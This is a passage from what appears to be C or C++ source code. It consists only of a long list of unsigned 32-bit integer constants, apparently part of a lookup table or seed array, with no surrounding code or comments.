   2969426078U,
   1137695960U,
   3925706371U,
   2669146104U,
   229766862U,
   3852451815U,
   59466449U,
   1674335548U,
   2002948665U,
   376696853U,
   2932021699U,
   124887444U,
   4221389606U,
   1558096477U,
   461259350U,
   2692345291U,
   2025639890U,
   2058958104U,
   1511739981U,
   2864561479U,
   2882922443U,
   2652892311U,
   3295331192U,
   1880083709U,
   1187421633U,
   2625851153U,
   4086656971U,
   239931223U,
   1371986727U,
   344027144U,
   3244793462U,
   790292784U,
   3641420758U,
   2653562799U,
   2089691373U,
   2970374562U,
   2228647948U,
   3757076220U,
   1863216412U,
   4247346685U,
   3234826233U,
   2804683363U,
   2309990674U,
   11089145U,
   2866197008U,
   3216219287U,
   901463285U,
   851732270U,
   1921073470U,
   979781136U,
   1121210364U,
   3156818766U,
   4124265402U,
   1405416440U,
   3941022769U,
   1348456545U,
   831017109U,
   1217268866U,
   3844976995U,
   3461521314U,
   3519471392U,
   1531520549U,
   2681871167U,
   705473437U,
   1408433718U,
   605951223U,
   964883677U,
   2670017948U,
   856052341U,
   327217519U,
   1120719123U,
   3112663513U,
   2930693220U,
   645964179U,
   2189626343U,
   1189082776U,
   2531466103U,
   47694407U,
   1134687219U,
   1471341905U,
   3666346525U,
   3260341666U,
   4024423133U,
   3810106656U,
   3215729436U,
   646656914U,
   3704173228U,
   2937885228U,
   456285892U,
   2185734120U,
   590956348U,
   3790873435U,
   2835963269U,
   800454006U,
   2051174323U,
   830524258U,
   202840694U,
   2957338640U,
   3653148853U,
   4012700594U,
   2740267348U,
   1181104899U,
   887704752U,
   154210348U,
   1241212657U,
   169153137U,
   3804212239U,
   3525657277U,
   739926519U,
   3878490544U,
   5527939U,
   3782619201U,
   1529896570U,
   1147133093U,
   3541995684U,
   1687003232U,
   3206782097U,
   4107600528U,
   1288720122U,
   77712387U,
   1715764377U,
   2091488312U,
   1256246332U,
   3779980149U,
   1621616097U,
   1258514173U,
   734988410U,
   3726934555U,
   2391090974U,
   2563467273U,
   4288968198U,
   2023186336U,
   3685335272U,
   4074976313U,
   1770317854U,
   338914034U,
   3991123270U,
   2685756485U,
   100303184U,
   1905187275U,
   3727361367U,
   2863587652U,
   3538449551U,
   1297480099U,
   2052258804U,
   3655228790U,
   1920391349U,
   3534568495U,
   3279639200U,
   213145212U,
   204121083U,
   1208837986U,
   2172114303U,
   372427100U,
   205854891U,
   1579698239U,
   1532902589U,
   2444636508U,
   1579143080U,
   1659837724U,
   4109777612U,
   4133340140U,
   1685844072U,
   86337806U,
   4265284520U,
   4166362686U,
   671003698U,
   1430348697U,
   2452962514U,
   3463992648U,
   1030746284U,
   1749308754U,
   2328904731U,
   2556374347U,
   266009873U,
   202563377U,
   1428325798U,
   1407742280U,
   2858458115U,
   2872230037U,
   2100681356U,
   1855120280U,
   2698832909U,
   1194978316U,
   2308991628U,
   1654974108U,
   908511499U,
   2219352162U,
   1070657680U,
   1044760681U,
   3711616232U,
   3991389004U,
   3957342311U,
   672532718U,
   291821752U,
   130641486U,
   1375758865U,
   3624830012U,
   2161364824U,
   956829335U,
   3570180944U,
   384325989U,
   707944679U,
   949536783U,
   608689657U,
   1385363948U,
   813251742U,
   1550362373U,
   3998846624U,
   3034386008U,
   4178521217U,
   2270816348U,
   3719767983U,
   3037751498U,
   3836968238U,
   1050438380U,
   775192672U,
   2060211983U,
   735152023U,
   4228544740U,
   1599349967U,
   2914648611U,
   861419809U,
   1189759533U,
   3331756747U,
   4263283822U,
   2708664643U,
   4067978110U,
   3062572795U,
   4176742403U,
   33648124U,
   1694775708U,
   4215748870U,
   2536724224U,
   2508215547U,
   3128906975U,
   1091565986U,
   191146701U,
   3875038822U,
   474423918U,
   550704810U,
   3655231489U,
   1885734129U,
   3439523909U,
   61960527U,
   880199689U,
   4268792475U,
   828720366U,
   2564171131U,
   3566177249U,
   1729740313U,
   4168910762U,
   1291493094U,
   2781181267U,
   339047566U,
   1003521977U,
   423429241U,
   3107669323U,
   2687140064U,
   3377004942U,
   959738692U,
   3946552498U,
   45408810U,
   3058594939U,
   2665226119U,
   4245063226U,
   3702727387U,
   1411080289U,
   1604292345U,
   2006229269U,
   1143915353U,
   1984805890U,
   691164755U,
   4158568846U,
   2485764965U,
   3838650268U,
   1694480061U,
   1261537038U,
   1520449183U,
   2681151749U,
   2259445992U,
   3105907536U,
   3759681177U,
   1546507471U,
   3465226081U,
   2074610983U,
   3453633912U,
   1750166907U,
   1706411006U,
   2124949909U,
   2885388183U,
   884966515U,
   2501502388U,
   1304604539U,
   3779329703U,
   345167467U,
   1288239645U,
   4234346794U,
   751714253U,
   1280369196U,
   3550496963U,
   3876871932U,
   1245914938U,
   3808193600U,
   2048818499U,
   4197359775U,
   2741869066U,
   4026996054U,
   1440435043U,
   2370299435U,
   3640775419U,
   155662322U,
   645014640U,
   3821768028U,
   2317779624U,
   3305526806U,
   1320432060U,
   774010764U,
   3783552319U,
   1189896233U,
   1659929159U,
   881836052U,
   2536527175U,
   68546726U,
   2127948907U,
   4111392534U,
   4112882592U,
   4139773220U,
   1145906463U,
   1540679442U,
   3054847094U,
   3121435239U,
   3349100210U,
   1394946888U,
   723814237U,
   1662182038U,
   207878561U,
   3978725347U,
   2231209218U,
   584304220U,
   2300849196U,
   2926705231U,
   2063167222U,
   3369926383U,
   496468982U,
   2079390835U,
   1068421659U,
   4039750171U,
   1099418869U,
   3395778156U,
   2195851922U,
   1723854594U,
   940827923U,
   2727015028U,
   2959022480U,
   2834624070U,
   1511155244U,
   3952235074U,
   3749812293U,
   2045298348U,
   3196724645U,
   1187946693U,
   2156618222U,
   474770471U,
   2925698228U,
   2757613249U,
   3039080881U,
   2647326490U,
   3754276035U,
   1949930305U,
   2513822715U,
   2109233811U,
   2609579693U,
   1018691278U,
   1993380944U,
   1542854254U,
   1733690162U,
   2346404164U,
   2636668123U,
   2730412206U,
   3376484160U,
   424409865U,
   1440917639U,
   1196057439U,
   2955263546U,
   2284516357U,
   3621155634U,
   2070732226U,
   3009341332U,
   2395926474U,
   60221141U,
   263183445U,
   3285036824U,
   1185073063U,
   1301602802U,
   2265326937U,
   2010713075U,
   3047526025U,
   3708554767U,
   3552633487U,
   2874286157U,
   2730100576U,
   1529928958U,
   1585152365U,
   2266775004U,
   1071613692U,
   1416640483U,
   1212920136U,
   199600757U,
   590275581U,
   401369859U,
   3267649281U,
   3069727101U,
   2846800171U,
   2886058327U,
   128456336U,
   1725202009U,
   2996045778U,
   2205679203U,
   2477710944U,
   4209174189U,
   4154878115U,
   1133902045U,
   1839713785U,
   4131524972U,
   1197500161U,
   1081267452U,
   3839824679U,
   1354269001U,
   2587953475U,
   2532236276U,
   3491044383U,
   1024677387U,
   818167525U,
   460216871U,
   1616417229U,
   3135825229U,
   261078783U,
   3693604341U,
   1565522609U,
   3628274992U,
   2913193763U,
   184822314U,
   1590422795U,
   2577586124U,
   1958326911U,
   2044699103U,
   671542531U,
   2062395735U,
   3870519926U,
   2367432132U,
   1374198105U,
   296466595U,
   2573892539U,
   970167093U,
   1724886447U,
   1754989789U,
   955953269U,
   1717109593U,
   3200120159U,
   2560927853U,
   1610399119U,
   985685764U,
   1667078326U,
   2054609344U,
   1587952150U,
   751723336U,
   2474180080U,
   99236061U,
   2536884244U,
   3942902542U,
   2426099615U,
   1717344104U,
   2577751023U,
   3959711012U,
   326988609U,
   2875992131U,
   2619072715U,
   4191701542U,
   470296188U,
   1406626546U,
   3046638509U,
   2829779682U,
   1269853109U,
   588044213U,
   626325110U,
   3861627641U,
   302320478U,
   2211387410U,
   1475249284U,
   2149916632U,
   999086582U,
   40711328U,
   1909785856U,
   3080680972U,
   4036212513U,
   3474708489U,
   637763839U,
   3546979878U,
   2122193301U,
   19904524U,
   3474172716U,
   3510345416U,
   1756254781U,
   1982570050U,
   3976309902U,
   2072377095U,
   3566414203U,
   1379190321U,
   1351734202U,
   2583061056U,
   1539660083U,
   1510737483U,
   3878363284U,
   3954122817U,
   1598645228U,
   3743899323U,
   3691579473U,
   1321835197U,
   200820657U,
   3379029878U,
   3347355662U,
   197363784U,
   1350608908U,
   2457341462U,
   1565883452U,
   1941343655U,
   307216293U,
   1779139148U,
   3011078803U,
   3343430623U,
   2638876037U,
   1968654788U,
   590057636U,
   3245132369U,
   1323547667U,
   187003669U,
   1595456626U,
   3201276227U,
   2936348254U,
   947729706U,
   2237438100U,
   3533319661U,
   3892085885U,
   1955903533U,
   174841114U,
   835869603U,
   719850732U,
   283523156U,
   31736675U,
   2452442634U,
   2949618636U,
   1492616536U,
   2152170598U,
   2960238138U,
   112300326U,
   3987447053U,
   1739926372U,
   3214762990U,
   3603982706U,
   1457192415U,
   4025878636U,
   2697439345U,
   3491471765U,
   3275785808U,
   1111493566U,
   2208256191U,
   2612635845U,
   1846701425U,
   3826876186U,
   1015852363U,
   1634728015U,
   842571069U,
   367227594U,
   1800483915U,
   970105993U,
   3347521229U,
   2516026187U,
   1900368302U,
   3823340405U,
   2064204852U,
   4188154246U,
   867929119U,
   698114043U,
   1298248428U,
   338100501U,
   3526282219U,
   1773119201U,
   1682187116U,
   882923853U,
   735281417U,
   2254555217U,
   2804627863U,
   3456748141U,
   1656937833U,
   163835499U,
   3403710049U,
   804365434U,
   285917207U,
   2206120867U,
   1238546791U,
   822473760U,
   3488198105U,
   1639262892U,
   3581192070U,
   3279101622U,
   4086404702U,
   911582738U,
   1445619945U,
   3865594309U,
   1712081266U,
   2280449426U,
   1702752719U,
   3632161390U,
   905021864U,
   1370260716U,
   640486966U,
   234963583U,
   1019608738U,
   1117544255U,
   985153581U,
   1618841477U,
   1729659592U,
   4243164474U,
   2990128086U,
   1853785533U,
   227871943U,
   1837997052U,
   3161106231U,
   1678548909U,
   2667448838U,
   1772488984U,
   4095325278U,
   3352955058U,
   197890802U,
   730684345U,
   1924202383U,
   1485403949U,
   1538684482U,
   537583192U,
   567556072U,
   3523944203U,
   3524746121U,
   2940290614U,
   4001526136U,
   848359412U,
   2838593373U,
   508686740U,
   3744625750U,
   1760150437U,
   956557034U,
   273695988U,
   2064180017U,
   2949486792U,
   2782762397U,
   3645443970U,
   1577113158U,
   4154168671U,
   1324484968U,
   2634606107U,
   1746640497U,
   3312928354U,
   4223740201U,
   1557474243U,
   2594469193U,
   2350842720U,
   3261335991U,
   295734441U,
   3397542760U,
   3474516479U,
   2593404774U,
   2552224045U,
   1431964488U,
   538991337U,
   3937735748U,
   2563697124U,
   2568687435U,
   3137796467U,
   282395109U,
   2968754454U,
   3847257123U,
   2035816075U,
   2338091031U,
   1671994595U,
   1825088555U,
   4222494487U,
   3968950709U,
   1556296469U,
   584099690U,
   3461567991U,
   1490146646U,
   1022293053U,
   1922516240U,
   714077003U,
   2719419617U,
   4175861418U,
   3826329280U,
   1030772003U,
   4288647021U,
   575489283U,
   120093021U,
   1010029163U,
   2852023045U,
   2968554720U,
   1439965208U,
   930079867U,
   1319391315U,
   175669695U,
   990481516U,
   1524915772U,
   4001978509U,
   4018890413U,
   392413970U,
   2772122372U,
   1772920355U,
   2031950164U,
   227919688U,
   4259774980U,
   1840029154U,
   1754817637U,
   3364850965U,
   2186072382U,
   2173710513U,
   1123766046U,
   2628678457U,
   876797814U,
   2788489126U,
   1092064743U,
   632259719U,
   3113154901U,
   821354225U,
   626573683U,
   3051096712U,
   2163181207U,
   3355005826U,
   1369885677U,
   3103987763U,
   1089597846U,
   3838556679U,
   2979117386U,
   1320984158U,
   972533350U,
   3910149082U,
   1868101518U,
   521600546U,
   674443563U,
   293195986U,
   1835293247U,
   289468385U,
   2038957490U,
   1437933503U,
   1970118858U,
   2728611596U,
   2328889522U,
   2590774469U,
   1334332016U,
   1747020745U,
   3977168781U,
   3910027847U,
   392407433U,
   672092828U,
   284987551U,
   3894380438U,
   2053883967U,
   4191050330U,
   3686087325U,
   2344923246U,
   2081422013U,
   2619268805U,
   1561663941U,
   672202572U,
   831973383U,
   74418507U,
   1882472392U,
   1956481037U,
   4134523648U,
   242675332U,
   5438561U,
   2906331907U,
   4100656093U,
   3633098653U,
   2473746974U,
   3218391561U,
   3344350955U,
   1648271514U,
   2576215271U,
   2375743969U,
   2973443238U,
   2902476589U,
   377323071U,
   1176412554U,
   1578382115U,
   878199571U,
   3351096364U,
   2513764255U,
   3133936472U,
   1465269649U,
   4176497392U,
   3695556980U,
   4215685747U,
   1261495608U,
   4278927588U,
   1203959017U,
   284098692U,
   3134580370U,
   1696235478U,
   3477846908U,
   2181017521U,
   4009693747U,
   4177118253U,
   656067142U,
   268450312U,
   2932443379U,
   589968441U,
   2838649454U,
   1396648036U,
   76934070U,
   2949663516U,
   4249633584U,
   3027912135U,
   178141507U,
   1324334146U,
   6005923U,
   2997811443U,
   996854433U,
   3696432679U,
   711944458U,
   3883642985U,
   1560713178U,
   1861228750U,
   2283392334U,
   1765141426U,
   2239650798U,
   2639990036U,
   681717981U,
   3161238356U,
   3902803017U,
   320304531U,
   1135876094U,
   2891998257U,
   3333455799U,
   4249913133U,
   890447129U,
   2220321037U,
   4187318963U,
   1404536983U,
   1660607711U,
   94583566U,
   2180516990U,
   1336622101U,
   2417451062U,
   2166342485U,
   2279310494U,
   3836836677U,
   52696891U,
   2883305493U,
   3160055233U,
   1456569419U,
   342410314U,
   1613518129U,
   3595363073U,
   22413493U,
   2077048852U,
   1732193682U,
   3734612624U,
   3945133567U,
   1327506743U,
   1119835005U,
   2509100159U,
   793177140U,
   966007231U,
   1202652306U,
   1197736253U,
   1531666799U,
   3712599556U,
   659887180U,
   1377944508U,
   2899185588U,
   2110117541U,
   2013719636U,
   694850614U,
   2056787202U,
   4014430084U,
   2992617310U,
   99332358U,
   777471903U,
   1482476073U,
   2119854990U,
   2196800625U,
   1739114039U,
   3918532797U,
   744778215U,
   2842162417U,
   3239842481U,
   2063061541U,
   1963302885U,
   2042065391U,
   3725177362U,
   2925804153U,
   1367730113U,
   744366918U,
   465751892U,
   2852140204U,
   3605268222U,
   2244555014U,
   1979518266U,
   1242904698U,
   1500867938U,
   3449599548U,
   2286958763U,
   1746430348U,
   3483634597U,
   2574835359U,
   3524934723U,
   3669052097U,
   1114226047U,
   453163391U,
   1453587671U,
   3278648119U,
   3906467981U,
   732276462U,
   1842178285U,
   617975948U,
   3708696214U,
   3239861974U,
   2368739969U,
   1154980282U,
   4088116280U,
   268758239U,
   2926081154U,
   331523420U,
   288434156U,
   2967283585U,
   3659283508U,
   1315478755U,
   2368745595U,
   3747800381U,
   4041203346U,
   806641796U,
   1981471848U,
   2275108945U,
   2421950397U,
   463121548U,
   1423944740U,
   3992982687U,
   2977096592U,
   2026374467U,
   1464962575U,
   4176142234U,
   1142555763U,
   1682470983U,
   1819347037U,
   3651334432U,
   3241190812U,
   1001949663U,
   1949530998U,
   3141528375U,
   3756593944U,
   4053311690U,
   1308431371U,
   4096159658U,
   914127906U,
   84721032U,
   2916402207U,
   2058632632U,
   3341370830U,
   4147309130U,
   1385410015U,
   2170182579U,
   586027057U,
   482756508U,
   1869941881U,
   4246155381U,
   3814330836U,
   1703579980U,
   3893896053U,
   176932171U,
   3712664392U,
   3388255947U,
   1298009989U,
   1805122949U,
   939204886U,
   4009928571U,
   2228920209U,
   1968145098U,
   3533873280U,
   3292134550U,
   2622926608U,
   3652725219U,
   4270116660U,
   2929200618U,
   1654117801U,
   2369438958U,
   1351453826U,
   2674007340U,
   483867452U,
   1036130208U,
   2010523114U,
   2276289033U,
   422328264U,
   1705868911U,
   3310141609U,
   3994513122U,
   3461275933U,
   2500680344U,
   3923552554U,
   2465017465U,
   2383482773U,
   1893573664U,
   2403839785U,
   3121227628U,
   1721995266U,
   2663427634U,
   3460881923U,
   2793990574U,
   2048089643U,
   2817022031U,
   2748780234U,
   4214836973U,
   3590592714U,
   3216926397U,
   131541498U,
   548271403U,
   2421770220U,
   3178847338U,
   855172584U,
   3150474109U,
   2519232830U,
   2765222588U,
   3327129409U,
   2470636801U,
   920498342U,
   2638651905U,
   3296226950U,
   1082428954U,
   1157307793U,
   3212135499U,
   1894630943U,
   2193399460U,
   1296360620U,
   3870901176U,
   1017849107U,
   2607531639U,
   2898074791U,
   761843998U,
   817333363U,
   2921951387U,
   1802719887U,
   395857344U,
   3248630870U,
   683291277U,
   1182684611U,
   3267280462U,
   108940474U,
   321516337U,
   1579033583U,
   3928512770U,
   367514359U,
   1198691571U,
   3207558668U,
   292481712U,
   4123276540U,
   2772664332U,
   2666845225U,
   3954333068U,
   2714179562U,
   2039297186U,
   3475411342U,
   947917360U,
   89913358U,
   1343098818U,
   3455354014U,
   681414446U,
   822200943U,
   2675802625U,
   1994208518U,
   747806765U,
   3698120322U,
   1380852909U,
   1325812044U,
   1687861795U,
   3470115537U,
   1521000647U,
   3567792617U,
   4020595034U,
   963022883U,
   1643425026U,
   1168841221U,
   3295005125U,
   3071145151U,
   1867460176U,
   3730481968U,
   4128768900U,
   4272176282U,
   3193421882U,
   4237408543U,
   4091297723U,
   2961566236U,
   3794819591U,
   2400223403U,
   2955817592U,
   262377392U,
   477926331U,
   4251178186U,
   4063251774U,
   3060879231U,
   634891350U,
   2776496729U,
   3443748644U,
   4254125356U,
   2495591515U,
   353539041U,
   31634255U,
   896633593U,
   1045871442U,
   1476923833U,
   1726715506U,
   2742785476U,
   224035820U,
   2466123913U,
   2948689990U,
   3176803266U,
   1750306189U,
   1522876918U,
   3958299148U,
   3873571075U,
   3822934251U,
   66125610U,
   1563077831U,
   2108958903U,
   2597689187U,
   1990685163U,
   1183800204U,
   3155574345U,
   1738777966U,
   3735430555U,
   1293641945U,
   2357473672U,
   4089858968U,
   681008556U,
   677967770U,
   3797512684U,
   1813193022U,
   1090554209U,
   34880679U,
   3809070483U,
   1092562151U,
   3322111074U,
   1098759715U,
   2608462249U,
   2991455537U,
   2541816098U,
   4148874762U,
   2346238441U,
   4053243757U,
   1876975496U,
   2265079520U,
   711811744U,
   846660585U,
   1977773881U,
   3012740039U,
   2445157908U,
   2509944933U,
   1562629656U,
   1697963700U,
   262616329U,
   3491562456U,
   968088515U,
   2001270343U,
   2506422499U,
   542525260U,
   1589799906U,
   1527722847U,
   2664652385U,
   2057813978U,
   1676825726U,
   3347673649U,
   866286049U,
   1360657238U,
   3952454510U,
   3160463051U,
   4203558701U,
   1477563543U,
   2258169639U,
   1838427270U,
   1757903U,
   2820040007U,
   2984470935U,
   2388587393U,
   291958737U,
   1408864615U,
   4126161233U,
   1866494409U,
   2320571246U,
   857420255U,
   2225362867U,
   206113193U,
   1471871615U,
   1461423866U,
   1357077244U,
   3874103230U,
   3058678313U,
   4162789475U,
   760046641U,
   1674277277U,
   2434548119U,
   1134879978U,
   3072282870U,
   883422171U,
   1356188108U,
   1676104914U,
   2577155070U,
   2364051322U,
   3992438983U,
   2534711003U,
   1713795725U,
   3938006234U,
   4238722140U,
   2758221319U,
   823986732U,
   37457971U,
   3124648609U,
   787537427U,
   3444042606U,
   3916426610U,
   2624608570U,
   1730705474U,
   533317668U,
   1398608547U,
   816512993U,
   3845019717U,
   1200911981U,
   1643698253U,
   1163192728U,
   2056408779U,
   3428417681U,
   63357663U,
   2303179402U,
   4045382833U,
   989271567U,
   343317671U,
   2726428833U,
   3017463544U,
   2705287108U,
   1190659160U,
   1392993088U,
   202927691U,
   4009090598U,
   2199590297U,
   1192169632U,
   2743722949U,
   1033339726U,
   1632016238U,
   3543508819U,
   3355004129U,
   1308882023U,
   1027953586U,
   4258880538U,
   3585249589U,
   1513164738U,
   3359288965U,
   2517516131U,
   1718567475U,
   263539294U,
   1357764232U,
   2532592721U,
   3851682179U,
   1981780833U,
   153566773U,
   2050385607U,
   408128657U,
   3275570087U,
   3043744698U,
   1551051260U,
   1908158725U,
   3778376565U,
   2568045517U,
   3759879110U,
   497257811U,
   3355473986U,
   3839988422U,
   3476205192U,
   2071845829U,
   3991824327U,
   3582520305U,
   2570616980U,
   2256689054U,
   3434967676U,
   1743121082U,
   2097512402U,
   3218242665U,
   2134194483U,
   1803964834U,
   1587693389U,
   1571522505U,
   253543531U,
   2773608905U,
   2500626349U,
   4036129249U,
   2173459452U,
   712187709U,
   1765440021U,
   3000336384U,
   1529759018U,
   2942056046U,
   2826903623U,
   3250391374U,
   375140597U,
   3063010988U,
   2520758689U,
   351297284U,
   1560603879U,
   999766485U,
   2705373885U,
   2690201480U,
   2497153345U,
   671648313U,
   1932765139U,
   3243896200U,
   1910376225U,
   338407159U,
   770544473U,
   497332741U,
   3899039173U,
   1159508106U,
   601752470U,
   9700737U,
   4264152001U,
   2222692899U,
   3304366345U,
   3703233755U,
   3277890785U,
   2245215264U,
   769845233U,
   1991655489U,
   541933937U,
   1126258131U,
   782115348U,
   70853506U,
   812871852U,
   3988107141U,
   1959202696U,
   808985869U,
   3465186850U,
   463604537U,
   2233666584U,
   1372843513U,
   3040383278U,
   3090905947U,
   1497790402U,
   3375304755U,
   802384552U,
   1399501546U,
   2766136609U,
   2632403201U,
   3487983788U,
   3285219914U,
   369683016U,
   3396384543U,
   831857453U,
   307191373U,
   3949032361U,
   3858821213U,
   1186433800U,
   814834881U,
   2362519004U,
   4215480917U,
   1211181301U,
   781690940U,
   2683814535U,
   2707674783U,
   2614153552U,
   4140135816U,
   1069932310U,
   3067741866U,
   1943387634U,
   478977912U,
   2348444502U,
   1102238887U,
   1130906637U,
   1899331724U,
   2439269350U,
   3757248569U,
   3663271406U,
   3870837422U,
   3732558681U,
   207979414U,
   2578512236U,
   1273194561U,
   474843916U,
   2458808111U,
   804536919U,
   237146570U,
   1960130075U,
   2140103576U,
   2333946235U,
   116820958U,
   1581890884U,
   4136207822U,
   2750908511U,
   1053008386U,
   3570786209U,
   3573967665U,
   3586885874U,
   2434109084U,
   116088872U,
   172322082U,
   1085664102U,
   652492824U,
   1666231197U,
   4189200340U,
   2524466055U,
   1746705040U,
   339487852U,
   639133047U,
   4108521366U,
   1107077628U,
   1824570908U,
   1742677466U,
   3855530969U,
   3454230495U,
   1591968487U,
   3294775925U,
   1083453288U,
   1902398674U,
   667917570U,
   2191031793U,
   3757853880U,
   1721938049U,
   455887092U,
   2989467754U,
   3872282576U,
   790084265U,
   3874468372U,
   4081927257U,
   3357612104U,
   2395805531U,
   4264492987U,
   3127835762U,
   1566843009U,
   1184064787U,
   187858990U,
   2096137907U,
   3296738867U,
   2485509788U,
   1627725942U,
   3396212930U,
   2952466471U,
   3693341890U,
   2855305323U,
   1190340429U,
   2805907338U,
   4161506959U,
   3635856623U,
   2553714929U,
   2092016935U,
   3649850693U,
   2654895847U,
   276776198U,
   4091236057U,
   555116317U,
   473280404U,
   3380393378U,
   753062965U,
   2379353163U,
   436053019U,
   1913429412U,
   819422807U,
   1914906319U,
   3320101422U,
   625409575U,
   100186052U,
   882061093U,
   978109580U,
   1286262494U,
   1153766918U,
   471722282U,
   3464568570U,
   2724387098U,
   2738231425U,
   707666617U,
   2333144573U,
   1271185850U,
   327106838U,
   2455493054U,
   414970255U,
   2443319919U,
   2643631639U,
   682305554U,
   3580529551U,
   3497110438U,
   2541895334U,
   2700458056U,
   4207597386U,
   2855925371U,
   2456275967U,
   2496290131U,
   1659604263U,
   1167429038U,
   562703400U,
   1585102596U,
   2956541607U,
   3885847226U,
   1707868243U,
   2154227086U,
   461276857U,
   85788757U,
   1983432885U,
   4029931218U,
   3514013438U,
   1417869955U,
   4142097103U,
   2756218719U,
   1862155530U,
   2794971626U,
   3344140712U,
   4285455337U,
   3332574411U,
   4242430034U,
   4225968825U,
   1178888262U,
   3052522495U,
   17623342U,
   3580831054U,
   1388242987U,
   1831589423U,
   1072801508U,
   2292751149U,
   3600514280U,
   2077047267U,
   1311372411U,
   3876709736U,
   2945778842U,
   1325243666U,
   2371002087U,
   1806691266U,
   1052207560U,
   1370934452U,
   2413461890U,
   3616348076U,
   2640658555U,
   1272190370U,
   342569157U,
   2249839308U,
   1151632697U,
   1591058608U,
   3917557185U,
   3244430680U,
   903027543U,
   3195293709U,
   309218132U,
   1820570078U,
   804360737U,
   3480077124U,
   3480927780U,
   2712741503U,
   2068623903U,
   1234832547U,
   4258210510U,
   438207442U,
   3604279514U,
   3696361945U,
   3870939866U,
   1272809980U,
   3043803602U,
   3306182716U,
   4023204546U,
   1812329687U,
   4250828639U,
   1696828155U,
   3430087944U,
   2850382007U,
   2395344067U,
   4067845954U,
   3223969393U,
   1012212890U,
   3141360289U,
   3717311140U,
   3261378353U,
   179069338U,
   958209790U,
   1282778992U,
   2218239157U,
   1716585497U,
   872991590U,
   1199557677U,
   1205721974U,
   3267596190U,
   1653047189U,
   3709149111U,
   3418269294U,
   4201350653U,
   518002682U,
   2855796223U,
   4098394674U,
   2704071069U,
   818297484U,
   3404251133U,
   984225603U,
   2572027208U,
   1476874149U,
   1294503433U,
   2805887315U,
   1416174446U,
   2435294056U,
   2083148364U,
   2407267349U,
   3749597321U,
   1405735931U,
   630231899U,
   2799716385U,
   3575547129U,
   1948393653U,
   1542369729U,
   1258786136U,
   1268663107U,
   2242983892U,
   575474554U,
   4051284346U,
   4090987496U,
   878440001U,
   2779969709U,
   3241655036U,
   1951827723U,
   2358304226U,
   2005560292U,
   2290734574U,
   2075945780U,
   4091176627U,
   338457394U,
   473716025U,
   1871205316U,
   2576235441U,
   216023587U,
   161786070U,
   2175449217U,
   1688838510U,
   1221024345U,
   1932671943U,
   3882650557U,
   2732174143U,
   1186026714U,
   3955832875U,
   2864853061U,
   3169018659U,
   26484841U,
   2267568036U,
   3268136477U,
   2841496864U,
   1037812002U,
   4001857607U,
   2577082722U,
   2448728146U,
   2696358384U,
   694414467U,
   1391332241U,
   1188278435U,
   2442546937U,
   1755995046U,
   2854380562U,
   1425635377U,
   587093837U,
   3098000732U,
   703616651U,
   3399558002U,
   2235674705U,
   2924077456U,
   3415481785U,
   2190819848U,
   1272623388U,
   2949515071U,
   1502759376U,
   1456837774U,
   451165552U,
   2021749114U,
   3123717887U,
   1761660971U,
   3270740489U,
   2626491424U,
   2552850043U,
   1590059852U,
   2753197408U,
   290287743U,
   876826257U,
   2221278644U,
   3029789511U,
   3085796540U,
   2224061789U,
   3766681320U,
   3369050005U,
   845660186U,
   2515119166U,
   1162590833U,
   2257556711U,
   4211685012U,
   45207080U,
   2714442097U,
   1986645260U,
   533397160U,
   1565643807U,
   2786553161U,
   497767071U,
   1700318034U,
   980744921U,
   2904195105U,
   3502194852U,
   3079818771U,
   1835308846U,
   1387414233U,
   4173967104U,
   736977167U,
   439822955U,
   4075474452U,
   2464978676U,
   527502233U,
   1030444426U,
   256714223U,
   2293793940U,
   2797307235U,
   3799555945U,
   1559249805U,
   3269731078U,
   116062105U,
   1513394078U,
   208303387U,
   1815241128U,
   2551873519U,
   100179803U,
   196434594U,
   3647701552U,
   1468391995U,
   1179079315U,
   309449458U,
   116050325U,
   157390202U,
   1702309316U,
   3857648203U,
   217559816U,
   646913602U,
   1093853306U,
   688655199U,
   3467455436U,
   3882885382U,
   228006194U,
   1936584682U,
   2945743539U,
   4212355899U,
   3194467848U,
   3871696015U,
   1617150488U,
   784443729U,
   2005771911U,
   2020041058U,
   1933624798U,
   1823326008U,
   1011851779U,
   303116186U,
   2962444673U,
   787285491U,
   2736415201U,
   691592512U,
   3987040621U,
   2149173134U,
   1537631533U,
   2361460118U,
   1683675674U,
   2484597109U,
   2476406323U,
   109102190U,
   1590128365U,
   4269571406U,
   4100395621U,
   2985899287U,
   3543107924U,
   323000808U,
   32928323U,
   3183365641U,
   3143906848U,
   4043946961U,
   2893003048U,
   2464917617U,
   3008367677U,
   853476980U,
   79629157U,
   51978334U,
   1528062964U,
   1195074306U,
   2440997194U,
   32012954U,
   1377784447U,
   1335889115U,
   3262949328U,
   4209084697U,
   1492198441U,
   3968075656U,
   129638660U,
   2322003424U,
   3266293897U,
   2894309734U,
   3813022466U,
   3533106861U,
   907608570U,
   1128130288U,
   1231755583U,
   3473388158U,
   3750358626U,
   3135707456U,
   1888873456U,
   3046619945U,
   3593540296U,
   3053704113U,
   82710823U,
   2206152285U,
   793192570U,
   2725693253U,
   1487062731U,
   3362964924U,
   1087063202U,
   2523392308U,
   1469155159U,
   1540051395U,
   2525220233U,
   4245354711U,
   3294392501U,
   1832151760U,
   1967074166U,
   1821978260U,
   2770371678U,
   1234727324U,
   2271878924U,
   2826168707U,
   460062706U,
   277007018U,
   3909596396U,
   1697217261U,
   1534855786U,
   3977416490U,
   235254130U,
   2746419310U,
   1038155472U,
   2997587779U,
   2938590394U,
   2123337840U,
   2011675454U,
   402002034U,
   3942246434U,
   3296642860U,
   1809282338U,
   1552910518U,
   3229652606U,
   1479429466U,
   2429333919U,
   2309579090U,
   3067192355U,
   2259863336U,
   2222929817U,
   1181868833U,
   1037631768U,
   3669124847U,
   2917203020U,
   3266870703U,
   134408892U,
   2902176233U,
   2741515636U,
   575771196U,
   670743997U,
   156669756U,
   141485590U,
   2124716649U,
   267946182U,
   1044998947U,
   241830284U,
   393987564U,
   3107546047U,
   2076207140U,
   3176040450U,
   1727927656U,
   2957035074U,
   2732416876U,
   609111941U,
   1615814916U,
   2301649814U,
   1982393223U,
   2921766733U,
   1689798223U,
   2909578553U,
   628742102U,
   1630855686U,
   392023852U,
   40121953U,
   2785472558U,
   1750782959U,
   2419453993U,
   1575149371U,
   2096237638U,
   2592832215U,
   1494901379U,
   2941344685U,
   3261270272U,
   3700205637U,
   2037097926U,
   1075587554U,
   2433259446U,
   1006237716U,
   2164058782U,
   3922990648U,
   2378494061U,
   2457195892U,
   861599496U,
   834615140U,
   2553597053U,
   3966589482U,
   2501422571U,
   1724419374U,
   934663397U,
   2466242392U,
   504632192U,
   4055165318U,
   1630460167U,
   1675343227U,
   345621529U,
   2290914806U,
   2151129910U,
   1122016658U,
   494309411U,
   4031264849U,
